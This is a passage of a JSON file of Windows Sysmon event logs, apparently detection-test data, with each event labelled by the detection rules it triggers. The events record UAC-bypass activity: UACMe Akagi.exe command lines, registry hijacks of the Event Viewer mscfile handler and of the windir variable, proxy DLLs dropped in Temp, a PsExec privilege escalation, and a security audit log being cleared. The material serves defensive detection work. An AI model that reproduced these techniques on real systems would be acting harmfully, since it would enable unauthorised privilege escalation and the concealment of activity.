18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution_attributes":{"ProcessID":2896,"ThreadID":3548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" ","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution_attributes":{"ProcessID":1276,"ThreadID":6720},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 